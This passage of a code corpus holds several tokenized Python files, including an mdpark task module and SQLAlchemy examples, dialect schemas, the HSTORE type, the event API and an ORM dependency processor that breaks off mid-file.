<s> import pickle <EOL> from mdpark . utils import load_func , dump_func <EOL> from mdpark . shuffle import LocalFileShuffle <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class TaskContext : <EOL> def __init__ ( self , stageId , splitId , attemptId ) : <EOL> self . stageId = stageId <EOL> self . splitId = splitId <EOL> self . attemptId = attemptId <EOL> class TaskResult : <EOL> def __init__ ( self , value , accumUpdates ) : <EOL> self . value = value <EOL> self . accumUpdates = accumUpdates <EOL> class Task : <EOL> nextId = <NUM_LIT:0> <EOL> @ classmethod <EOL> def newId ( cls ) : <EOL> cls . nextId += <NUM_LIT:1> <EOL> return cls . nextId <EOL> def run ( self , id ) : <EOL> raise NotImplementedError <EOL> def preferredLocations ( self ) : <EOL> raise NotImplementedError <EOL> class DAGTask ( Task ) : <EOL> def __init__ ( self , stageId ) : <EOL> self . id = self . newId ( ) <EOL> self . stageId = stageId <EOL> class ResultTask ( DAGTask ) : <EOL> def __init__ ( self , stageId , rdd , func , partition , locs , outputId ) : <EOL> DAGTask . __init__ ( self , stageId ) <EOL> self . rdd = rdd <EOL> self . func = func <EOL> self . partition = partition <EOL> self . split = rdd . splits [ partition ] <EOL> self . locs = locs <EOL> self . outputId = outputId <EOL> def run ( self , attemptId ) : <EOL> context = TaskContext ( self . stageId , self . partition , attemptId ) <EOL> return self . func ( context , self . rdd . iterator ( self . split ) ) <EOL> def preferredLocations ( self ) : <EOL> return self . locs <EOL> def __hash__ ( self ) : <EOL> return self . rdd . id * <NUM_LIT> + self . partition <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . stageId , self . partition ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> def __getstate__ ( self ) : <EOL> d = dict ( self . __dict__ ) <EOL> del d [ '<STR_LIT>' ] <EOL> return d , dump_func ( self . func ) <EOL> def __setstate__ ( self , state ) : <EOL> self . 
__dict__ , code = state <EOL> self . func = load_func ( code , globals ( ) ) <EOL> class ShuffleMapTask ( DAGTask ) : <EOL> def __init__ ( self , stageId , rdd , dep , partition , locs ) : <EOL> DAGTask . __init__ ( self , stageId ) <EOL> self . stageId = stageId <EOL> self . rdd = rdd <EOL> self . dep = dep <EOL> self . partition = partition <EOL> self . split = rdd . splits [ partition ] <EOL> self . locs = locs <EOL> def run ( self , attempId ) : <EOL> aggregator = self . dep . aggregator <EOL> partitioner = self . dep . partitioner <EOL> numOutputSplits = partitioner . numPartitions <EOL> buckets = [ { } for i in range ( numOutputSplits ) ] <EOL> for k , v in self . rdd . iterator ( self . split ) : <EOL> bucketId = partitioner . getPartition ( k ) <EOL> bucket = buckets [ bucketId ] <EOL> if k in bucket : <EOL> bucket [ k ] = aggregator . mergeValue ( bucket [ k ] , v ) <EOL> else : <EOL> bucket [ k ] = aggregator . createCombiner ( v ) <EOL> for i in range ( numOutputSplits ) : <EOL> path = LocalFileShuffle . getOutputFile ( self . dep . shuffleId , <EOL> self . partition , i ) <EOL> f = open ( path , '<STR_LIT:w>' ) <EOL> logger . info ( '<STR_LIT>' , buckets [ i ] . items ( ) ) <EOL> pickle . dump ( buckets [ i ] . items ( ) , f ) <EOL> f . close ( ) <EOL> return LocalFileShuffle . getServerUri ( ) </s>
"""<STR_LIT>"""
from sqlalchemy import (MetaData, Table, Column, Integer, String, ForeignKey,
                        Unicode, and_, create_engine)
from sqlalchemy.orm import mapper, relationship, Session, lazyload
import sys, os, io, re
from xml.etree import ElementTree

e = create_engine('<STR_LIT>')
meta = MetaData()

documents = Table('<STR_LIT>', meta,
    Column('<STR_LIT>', Integer, primary_key=True),
    Column('filename', String(30), unique=True),
    Column('<STR_LIT>', Integer, ForeignKey('<STR_LIT>'))
)

elements = Table('<STR_LIT>', meta,
    Column('<STR_LIT>', Integer, primary_key=True),
    Column('<STR_LIT>', Integer, ForeignKey('<STR_LIT>')),
    Column('<STR_LIT>', Unicode(30), nullable=False),
    Column('text', Unicode),
    Column('<STR_LIT>', Unicode)
)

attributes = Table('<STR_LIT>', meta,
    Column('<STR_LIT>', Integer, ForeignKey('<STR_LIT>'), primary_key=True),
    Column('name', Unicode(100), nullable=False, primary_key=True),
    Column('value', Unicode(255)))

meta.create_all(e)


class Document(object):
    """A stored XML document: a filename plus its ElementTree."""

    def __init__(self, name, element):
        self.filename = name
        self.element = element

    def __str__(self):
        buf = io.StringIO()
        self.element.write(buf)
        return buf.getvalue()


class _Node(object):
    """Row object for one XML element."""
    pass


class _Attribute(object):
    """Row object for one XML attribute (name/value pair)."""

    def __init__(self, name, value):
        self.name = name
        self.value = value


mapper(Document, documents, properties={
    '<STR_LIT>': relationship(_Node, lazy='<STR_LIT>', cascade="all")
})
mapper(_Node, elements, properties={
    '<STR_LIT>': relationship(_Node, cascade="all"),
    '<STR_LIT>': relationship(_Attribute, lazy='<STR_LIT>', cascade="<STR_LIT>"),
})
mapper(_Attribute, attributes)


class ElementTreeMarshal(object):
    """Descriptor that converts between row objects and an ElementTree."""

    def __get__(self, document, owner):
        if document is None:
            return self
        if hasattr(document, '<STR_LIT>'):
            return document._element

        def traverse(node, parent=None):
            # Rebuild the ElementTree from the persisted _Node/_Attribute rows.
            if parent is not None:
                elem = ElementTree.SubElement(parent, node.tag)
            else:
                elem = ElementTree.Element(node.tag)
            elem.text = node.text
            elem.tail = node.tail
            for attr in node.attributes:
                elem.attrib[attr.name] = attr.value
            for child in node.children:
                traverse(child, parent=elem)
            return elem

        document._element = ElementTree.ElementTree(traverse(document._root))
        return document._element

    def __set__(self, document, element):
        def traverse(node):
            n = _Node()
            n.tag = str(node.tag)
            n.text = str(node.text)
            n.tail = str(node.tail)
            n.children = [traverse(n2) for n2 in node]
            n.attributes = [_Attribute(str(k), str(v)) for k, v in node.attrib.items()]
            return n

        document._root = traverse(element.getroot())
        document._element = element

    def __delete__(self, document):
        del document._element
        document._root = []


Document.element = ElementTreeMarshal()

line = "<STR_LIT>"
session = Session(e)

# Load the sample documents. Loop variable renamed from ``file`` — it
# shadowed the builtin.
for fname in ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>'):
    filename = os.path.join(os.path.dirname(__file__), fname)
    doc = ElementTree.parse(filename)
    session.add(Document(fname, doc))

print("<STR_LIT>", line)
session.commit()
print("<STR_LIT>")
print("<STR_LIT>", line)

document = session.query(Document).filter_by(filename="<STR_LIT>").first()
print(document)

d = session.query(Document).join('<STR_LIT>', aliased=True).filter(_Node.tag == '<STR_LIT>').join('<STR_LIT>', aliased=True, from_joinpoint=True).filter(_Node.tag == '<STR_LIT>').join('<STR_LIT>', aliased=True, from_joinpoint=True).filter(
    and_(_Node.tag == '<STR_LIT>', _Node.text == '<STR_LIT>')).one()
print(d)


def find_document(path, compareto):
    """Query documents whose node at *path* has text equal to *compareto*."""
    # Removed dead locals from the original (``j = documents``,
    # ``prev_elements`` and the unused enumerate index).
    query = session.query(Document)
    attribute = '<STR_LIT>'
    for match in re.finditer(r'<STR_LIT>', path):
        (token, attrname, attrvalue) = match.group(1, 2, 3)
        query = query.join(attribute, aliased=True, from_joinpoint=True).filter(_Node.tag == token)
        attribute = '<STR_LIT>'
        if attrname:
            if attrvalue:
                query = query.join('<STR_LIT>', aliased=True, from_joinpoint=True).filter(
                    and_(_Attribute.name == attrname, _Attribute.value == attrvalue))
            else:
                query = query.join('<STR_LIT>', aliased=True, from_joinpoint=True).filter(
                    _Attribute.name == attrname)
    return query.options(lazyload('<STR_LIT>')).filter(_Node.text == compareto).all()


for path, compareto in (
        ('<STR_LIT>', '<STR_LIT>'),
        ('<STR_LIT>', '<STR_LIT>'),
        ('<STR_LIT>', '<STR_LIT>'),
        ('<STR_LIT>', '<STR_LIT>')
):
    print("<STR_LIT>" % (path, compareto), line)
    print([d.filename for d in find_document(path, compareto)])
<s> """<STR_LIT>""" <EOL> from . import Profiler <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> from sqlalchemy import Column , Integer , String , create_engine <EOL> from sqlalchemy . orm import Session , Bundle <EOL> Base = declarative_base ( ) <EOL> engine = None <EOL> class Customer ( Base ) : <EOL> __tablename__ = "<STR_LIT>" <EOL> id = Column ( Integer , primary_key = True ) <EOL> name = Column ( String ( <NUM_LIT:255> ) ) <EOL> description = Column ( String ( <NUM_LIT:255> ) ) <EOL> Profiler . init ( "<STR_LIT>" , num = <NUM_LIT> ) <EOL> @ Profiler . setup_once <EOL> def setup_database ( dburl , echo , num ) : <EOL> global engine <EOL> engine = create_engine ( dburl , echo = echo ) <EOL> Base . metadata . drop_all ( engine ) <EOL> Base . metadata . create_all ( engine ) <EOL> s = Session ( engine ) <EOL> for chunk in range ( <NUM_LIT:0> , num , <NUM_LIT> ) : <EOL> s . execute ( <EOL> Customer . __table__ . insert ( ) , <EOL> params = [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' % i , <EOL> '<STR_LIT:description>' : '<STR_LIT>' % i <EOL> } for i in range ( chunk , chunk + <NUM_LIT> ) ] ) <EOL> s . commit ( ) <EOL> @ Profiler . profile <EOL> def test_orm_full_objects_list ( n ) : <EOL> """<STR_LIT>""" <EOL> sess = Session ( engine ) <EOL> objects = list ( sess . query ( Customer ) . limit ( n ) ) <EOL> @ Profiler . profile <EOL> def test_orm_full_objects_chunks ( n ) : <EOL> """<STR_LIT>""" <EOL> sess = Session ( engine ) <EOL> for obj in sess . query ( Customer ) . yield_per ( <NUM_LIT:1000> ) . limit ( n ) : <EOL> pass <EOL> @ Profiler . profile <EOL> def test_orm_bundles ( n ) : <EOL> """<STR_LIT>""" <EOL> sess = Session ( engine ) <EOL> bundle = Bundle ( '<STR_LIT>' , <EOL> Customer . id , Customer . name , Customer . description ) <EOL> for row in sess . query ( bundle ) . yield_per ( <NUM_LIT> ) . limit ( n ) : <EOL> pass <EOL> @ Profiler . 
profile <EOL> def test_orm_columns ( n ) : <EOL> """<STR_LIT>""" <EOL> sess = Session ( engine ) <EOL> for row in sess . query ( <EOL> Customer . id , Customer . name , <EOL> Customer . description ) . yield_per ( <NUM_LIT> ) . limit ( n ) : <EOL> pass <EOL> @ Profiler . profile <EOL> def test_core_fetchall ( n ) : <EOL> """<STR_LIT>""" <EOL> with engine . connect ( ) as conn : <EOL> result = conn . execute ( Customer . __table__ . select ( ) . limit ( n ) ) . fetchall ( ) <EOL> for row in result : <EOL> data = row [ '<STR_LIT:id>' ] , row [ '<STR_LIT:name>' ] , row [ '<STR_LIT:description>' ] <EOL> @ Profiler . profile <EOL> def test_core_fetchmany_w_streaming ( n ) : <EOL> """<STR_LIT>""" <EOL> with engine . connect ( ) as conn : <EOL> result = conn . execution_options ( stream_results = True ) . execute ( Customer . __table__ . select ( ) . limit ( n ) ) <EOL> while True : <EOL> chunk = result . fetchmany ( <NUM_LIT> ) <EOL> if not chunk : <EOL> break <EOL> for row in chunk : <EOL> data = row [ '<STR_LIT:id>' ] , row [ '<STR_LIT:name>' ] , row [ '<STR_LIT:description>' ] <EOL> @ Profiler . profile <EOL> def test_core_fetchmany ( n ) : <EOL> """<STR_LIT>""" <EOL> with engine . connect ( ) as conn : <EOL> result = conn . execute ( Customer . __table__ . select ( ) . limit ( n ) ) <EOL> while True : <EOL> chunk = result . fetchmany ( <NUM_LIT> ) <EOL> if not chunk : <EOL> break <EOL> for row in chunk : <EOL> data = row [ '<STR_LIT:id>' ] , row [ '<STR_LIT:name>' ] , row [ '<STR_LIT:description>' ] <EOL> @ Profiler . profile <EOL> def test_dbapi_fetchall_plus_append_objects ( n ) : <EOL> """<STR_LIT>""" <EOL> _test_dbapi_raw ( n , True ) <EOL> @ Profiler . profile <EOL> def test_dbapi_fetchall_no_object ( n ) : <EOL> """<STR_LIT>""" <EOL> _test_dbapi_raw ( n , False ) <EOL> def _test_dbapi_raw ( n , make_objects ) : <EOL> compiled = Customer . __table__ . select ( ) . limit ( n ) . compile ( <EOL> dialect = engine . 
dialect , <EOL> compile_kwargs = { "<STR_LIT>" : True } ) <EOL> if make_objects : <EOL> class SimpleCustomer ( object ) : <EOL> def __init__ ( self , id , name , description ) : <EOL> self . id = id <EOL> self . name = name <EOL> self . description = description <EOL> sql = str ( compiled ) <EOL> conn = engine . raw_connection ( ) <EOL> cursor = conn . cursor ( ) <EOL> cursor . execute ( sql ) <EOL> if make_objects : <EOL> for row in cursor . fetchall ( ) : <EOL> customer = SimpleCustomer ( <EOL> id = row [ <NUM_LIT:0> ] , name = row [ <NUM_LIT:1> ] , description = row [ <NUM_LIT:2> ] ) <EOL> else : <EOL> for row in cursor . fetchall ( ) : <EOL> data = row [ <NUM_LIT:0> ] , row [ <NUM_LIT:1> ] , row [ <NUM_LIT:2> ] <EOL> conn . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> Profiler . main ( ) </s>
<s> from ... import Table , MetaData , Column <EOL> from ... types import String , Unicode , UnicodeText , Integer , TypeDecorator <EOL> from ... import cast <EOL> from ... import util <EOL> from ... sql import expression <EOL> from ... ext . compiler import compiles <EOL> ischema = MetaData ( ) <EOL> class CoerceUnicode ( TypeDecorator ) : <EOL> impl = Unicode <EOL> def process_bind_param ( self , value , dialect ) : <EOL> if util . py2k and isinstance ( value , util . binary_type ) : <EOL> value = value . decode ( dialect . encoding ) <EOL> return value <EOL> def bind_expression ( self , bindvalue ) : <EOL> return _cast_on_2005 ( bindvalue ) <EOL> class _cast_on_2005 ( expression . ColumnElement ) : <EOL> def __init__ ( self , bindvalue ) : <EOL> self . bindvalue = bindvalue <EOL> @ compiles ( _cast_on_2005 ) <EOL> def _compile ( element , compiler , ** kw ) : <EOL> from . import base <EOL> if compiler . dialect . server_version_info < base . MS_2005_VERSION : <EOL> return compiler . process ( element . bindvalue , ** kw ) <EOL> else : <EOL> return compiler . process ( cast ( element . 
bindvalue , Unicode ) , ** kw ) <EOL> schemata = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> tables = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( <EOL> "<STR_LIT>" , String ( convert_unicode = True ) , <EOL> key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> columns = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> constraints = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String ( <EOL> convert_unicode = True ) , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> column_constraints = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , 
CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> key_constraints = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , <EOL> key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> ref_constraints = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> views = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) </s>
<s> import re <EOL> from . base import ischema_names <EOL> from . array import ARRAY <EOL> from ... import types as sqltypes <EOL> from ... sql import functions as sqlfunc <EOL> from ... sql import operators <EOL> from ... import util <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> GETITEM = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True , <EOL> ) <EOL> HAS_KEY = operators . custom_op ( <EOL> "<STR_LIT:?>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> HAS_ALL = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> HAS_ANY = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> CONTAINS = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> CONTAINED_BY = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> class HSTORE ( sqltypes . Indexable , sqltypes . Concatenable , sqltypes . TypeEngine ) : <EOL> """<STR_LIT>""" <EOL> __visit_name__ = '<STR_LIT>' <EOL> hashable = False <EOL> text_type = sqltypes . Text ( ) <EOL> def __init__ ( self , text_type = None ) : <EOL> """<STR_LIT>""" <EOL> if text_type is not None : <EOL> self . text_type = text_type <EOL> class Comparator ( <EOL> sqltypes . Indexable . Comparator , sqltypes . Concatenable . Comparator ) : <EOL> """<STR_LIT>""" <EOL> def has_key ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( HAS_KEY , other , result_type = sqltypes . Boolean ) <EOL> def has_all ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( HAS_ALL , other , result_type = sqltypes . Boolean ) <EOL> def has_any ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( HAS_ANY , other , result_type = sqltypes . 
Boolean ) <EOL> def contains ( self , other , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( CONTAINS , other , result_type = sqltypes . Boolean ) <EOL> def contained_by ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( <EOL> CONTAINED_BY , other , result_type = sqltypes . Boolean ) <EOL> def _setup_getitem ( self , index ) : <EOL> return GETITEM , index , self . type . text_type <EOL> def defined ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreDefinedFunction ( self . expr , key ) <EOL> def delete ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( key , dict ) : <EOL> key = _serialize_hstore ( key ) <EOL> return _HStoreDeleteFunction ( self . expr , key ) <EOL> def slice ( self , array ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreSliceFunction ( self . expr , array ) <EOL> def keys ( self ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreKeysFunction ( self . expr ) <EOL> def vals ( self ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreValsFunction ( self . expr ) <EOL> def array ( self ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreArrayFunction ( self . expr ) <EOL> def matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreMatrixFunction ( self . expr ) <EOL> comparator_factory = Comparator <EOL> def bind_processor ( self , dialect ) : <EOL> if util . py2k : <EOL> encoding = dialect . encoding <EOL> def process ( value ) : <EOL> if isinstance ( value , dict ) : <EOL> return _serialize_hstore ( value ) . encode ( encoding ) <EOL> else : <EOL> return value <EOL> else : <EOL> def process ( value ) : <EOL> if isinstance ( value , dict ) : <EOL> return _serialize_hstore ( value ) <EOL> else : <EOL> return value <EOL> return process <EOL> def result_processor ( self , dialect , coltype ) : <EOL> if util . py2k : <EOL> encoding = dialect . encoding <EOL> def process ( value ) : <EOL> if value is not None : <EOL> return _parse_hstore ( value . 
decode ( encoding ) ) <EOL> else : <EOL> return value <EOL> else : <EOL> def process ( value ) : <EOL> if value is not None : <EOL> return _parse_hstore ( value ) <EOL> else : <EOL> return value <EOL> return process <EOL> ischema_names [ '<STR_LIT>' ] = HSTORE <EOL> class hstore ( sqlfunc . GenericFunction ) : <EOL> """<STR_LIT>""" <EOL> type = HSTORE <EOL> name = '<STR_LIT>' <EOL> class _HStoreDefinedFunction ( sqlfunc . GenericFunction ) : <EOL> type = sqltypes . Boolean <EOL> name = '<STR_LIT>' <EOL> class _HStoreDeleteFunction ( sqlfunc . GenericFunction ) : <EOL> type = HSTORE <EOL> name = '<STR_LIT>' <EOL> class _HStoreSliceFunction ( sqlfunc . GenericFunction ) : <EOL> type = HSTORE <EOL> name = '<STR_LIT>' <EOL> class _HStoreKeysFunction ( sqlfunc . GenericFunction ) : <EOL> type = ARRAY ( sqltypes . Text ) <EOL> name = '<STR_LIT>' <EOL> class _HStoreValsFunction ( sqlfunc . GenericFunction ) : <EOL> type = ARRAY ( sqltypes . Text ) <EOL> name = '<STR_LIT>' <EOL> class _HStoreArrayFunction ( sqlfunc . GenericFunction ) : <EOL> type = ARRAY ( sqltypes . Text ) <EOL> name = '<STR_LIT>' <EOL> class _HStoreMatrixFunction ( sqlfunc . GenericFunction ) : <EOL> type = ARRAY ( sqltypes . Text ) <EOL> name = '<STR_LIT>' <EOL> HSTORE_PAIR_RE = re . compile ( r"""<STR_LIT>""" , re . VERBOSE ) <EOL> HSTORE_DELIMITER_RE = re . compile ( r"""<STR_LIT>""" , re . 
VERBOSE ) <EOL> def _parse_error ( hstore_str , pos ) : <EOL> """<STR_LIT>""" <EOL> ctx = <NUM_LIT:20> <EOL> hslen = len ( hstore_str ) <EOL> parsed_tail = hstore_str [ max ( pos - ctx - <NUM_LIT:1> , <NUM_LIT:0> ) : min ( pos , hslen ) ] <EOL> residual = hstore_str [ min ( pos , hslen ) : min ( pos + ctx + <NUM_LIT:1> , hslen ) ] <EOL> if len ( parsed_tail ) > ctx : <EOL> parsed_tail = '<STR_LIT>' + parsed_tail [ <NUM_LIT:1> : ] <EOL> if len ( residual ) > ctx : <EOL> residual = residual [ : - <NUM_LIT:1> ] + '<STR_LIT>' <EOL> return "<STR_LIT>" % ( <EOL> parsed_tail , pos , residual ) <EOL> def _parse_hstore ( hstore_str ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> pos = <NUM_LIT:0> <EOL> pair_match = HSTORE_PAIR_RE . match ( hstore_str ) <EOL> while pair_match is not None : <EOL> key = pair_match . group ( '<STR_LIT:key>' ) . replace ( r'<STR_LIT>' , '<STR_LIT:">' ) . replace ( <EOL> "<STR_LIT>" , "<STR_LIT:\\>" ) <EOL> if pair_match . group ( '<STR_LIT>' ) : <EOL> value = None <EOL> else : <EOL> value = pair_match . group ( '<STR_LIT:value>' ) . replace ( <EOL> r'<STR_LIT>' , '<STR_LIT:">' ) . replace ( "<STR_LIT>" , "<STR_LIT:\\>" ) <EOL> result [ key ] = value <EOL> pos += pair_match . end ( ) <EOL> delim_match = HSTORE_DELIMITER_RE . match ( hstore_str [ pos : ] ) <EOL> if delim_match is not None : <EOL> pos += delim_match . end ( ) <EOL> pair_match = HSTORE_PAIR_RE . match ( hstore_str [ pos : ] ) <EOL> if pos != len ( hstore_str ) : <EOL> raise ValueError ( _parse_error ( hstore_str , pos ) ) <EOL> return result <EOL> def _serialize_hstore ( val ) : <EOL> """<STR_LIT>""" <EOL> def esc ( s , position ) : <EOL> if position == '<STR_LIT:value>' and s is None : <EOL> return '<STR_LIT>' <EOL> elif isinstance ( s , util . string_types ) : <EOL> return '<STR_LIT>' % s . replace ( "<STR_LIT:\\>" , "<STR_LIT>" ) . 
replace ( '<STR_LIT:">' , r'<STR_LIT>' ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( s , position ) ) <EOL> return '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % ( esc ( k , '<STR_LIT:key>' ) , esc ( v , '<STR_LIT:value>' ) ) <EOL> for k , v in val . items ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . . import util , exc <EOL> from . base import _registrars <EOL> from . registry import _EventKey <EOL> CANCEL = util . symbol ( '<STR_LIT>' ) <EOL> NO_RETVAL = util . symbol ( '<STR_LIT>' ) <EOL> def _event_key ( target , identifier , fn ) : <EOL> for evt_cls in _registrars [ identifier ] : <EOL> tgt = evt_cls . _accept_with ( target ) <EOL> if tgt is not None : <EOL> return _EventKey ( target , identifier , fn , tgt ) <EOL> else : <EOL> raise exc . InvalidRequestError ( "<STR_LIT>" % <EOL> ( identifier , target ) ) <EOL> def listen ( target , identifier , fn , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> _event_key ( target , identifier , fn ) . listen ( * args , ** kw ) <EOL> def listens_for ( target , identifier , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> def decorate ( fn ) : <EOL> listen ( target , identifier , fn , * args , ** kw ) <EOL> return fn <EOL> return decorate <EOL> def remove ( target , identifier , fn ) : <EOL> """<STR_LIT>""" <EOL> _event_key ( target , identifier , fn ) . remove ( ) <EOL> def contains ( target , identifier , fn ) : <EOL> """<STR_LIT>""" <EOL> return _event_key ( target , identifier , fn ) . contains ( ) </s>
<s> """<STR_LIT>""" <EOL> from . . import sql , util , exc as sa_exc <EOL> from . import attributes , exc , sync , unitofwork , util as mapperutil <EOL> from . interfaces import ONETOMANY , MANYTOONE , MANYTOMANY <EOL> class DependencyProcessor ( object ) : <EOL> def __init__ ( self , prop ) : <EOL> self . prop = prop <EOL> self . cascade = prop . cascade <EOL> self . mapper = prop . mapper <EOL> self . parent = prop . parent <EOL> self . secondary = prop . secondary <EOL> self . direction = prop . direction <EOL> self . post_update = prop . post_update <EOL> self . passive_deletes = prop . passive_deletes <EOL> self . passive_updates = prop . passive_updates <EOL> self . enable_typechecks = prop . enable_typechecks <EOL> if self . passive_deletes : <EOL> self . _passive_delete_flag = attributes . PASSIVE_NO_INITIALIZE <EOL> else : <EOL> self . _passive_delete_flag = attributes . PASSIVE_OFF <EOL> if self . passive_updates : <EOL> self . _passive_update_flag = attributes . PASSIVE_NO_INITIALIZE <EOL> else : <EOL> self . _passive_update_flag = attributes . PASSIVE_OFF <EOL> self . key = prop . key <EOL> if not self . prop . synchronize_pairs : <EOL> raise sa_exc . ArgumentError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> self . prop ) <EOL> @ classmethod <EOL> def from_relationship ( cls , prop ) : <EOL> return _direction_to_processor [ prop . direction ] ( prop ) <EOL> def hasparent ( self , state ) : <EOL> """<STR_LIT>""" <EOL> return self . parent . class_manager . get_impl ( self . key ) . hasparent ( state ) <EOL> def per_property_preprocessors ( self , uow ) : <EOL> """<STR_LIT>""" <EOL> uow . register_preprocessor ( self , True ) <EOL> def per_property_flush_actions ( self , uow ) : <EOL> after_save = unitofwork . ProcessAll ( uow , self , False , True ) <EOL> before_delete = unitofwork . ProcessAll ( uow , self , True , True ) <EOL> parent_saves = unitofwork . SaveUpdateAll ( <EOL> uow , <EOL> self . parent 